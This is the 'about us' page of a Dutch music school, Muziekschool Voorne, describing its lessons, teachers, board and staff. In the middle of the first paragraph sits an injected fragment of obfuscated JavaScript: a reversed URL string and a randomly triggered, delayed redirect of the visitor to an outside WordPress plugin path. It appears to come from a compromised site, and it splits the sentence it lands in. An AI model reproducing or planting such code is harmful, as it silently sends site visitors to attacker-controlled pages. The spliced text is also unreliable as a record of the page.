over ons

Welkom op de site van de Muziekschool Voorne

Op deze site vindt u het lesaanbod en de cursussen van de muziekschool uit Brielle, Hellevoetsluis en Westvoorne (locatie Rockanje). U kunt bij ons terecht voor cursussen en muzieklessen voor alle leeftijden, van dreumes toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot volwassene. Wij werken uitsluitend met ervaren en vakbekwame docenten. Zij weten het muzikale talent bij iedere leerling optimaal te stimuleren en benutten, waarbij het plezier met muziek altijd voorop staat.

I.s.m. collega docenten bieden wij ook aan: harp, cello, saxofoon en djembe.

Muziekschool Voorne staat voor veilig onderwijs: juist bij individuele (muziek-)lessen is het voor u belangrijk om te weten dat al onze docenten beschikken over een VOG-verklaring (verklaring omtrent gedrag).

Ook heeft Muziekschool Voorne een breed aanbod voor de basisscholen. Naast het reguliere lespakket treft u ook een aantal workshops aan; dit geeft u de mogelijkheid om zelf te ondervinden, hoe leuk het is om muziek te maken. Tevens hebben wij aanbod voor een aantal cursussen met een bijzonder thema. Wij wensen u veel succes bij het zoeken naar de muziekles die bij u en uw kinderen past en hopen u (wederom) te mogen verwelkomen bij Muziekschool Voorne!

BESTUUR EN ORGANISATIE VAN MUZIEKSCHOOL VOORNE

Het bestuur bestaat sinds 26 juni 2012 uit de volgende, zich op vrijwillige basis voor Stichting Muziekschool Voorne inzettende leden: Robert Koerts(voorzitter), Arthur van Gemert (penningmeester) en Natascha de Bruin (algemeen lid).

ADMINISTRATIE VAN MUZIEKSCHOOL VOORNE

Sinds 2009 werkt Anja Moree met veel plezier als administratief medewerkster bij Stichting Muziekschool Voorne. Zij verzorgt de leerlingen- en financiële administratie en is tevens het aanspreekpunt voor ouders, leerlingen en docenten.

Top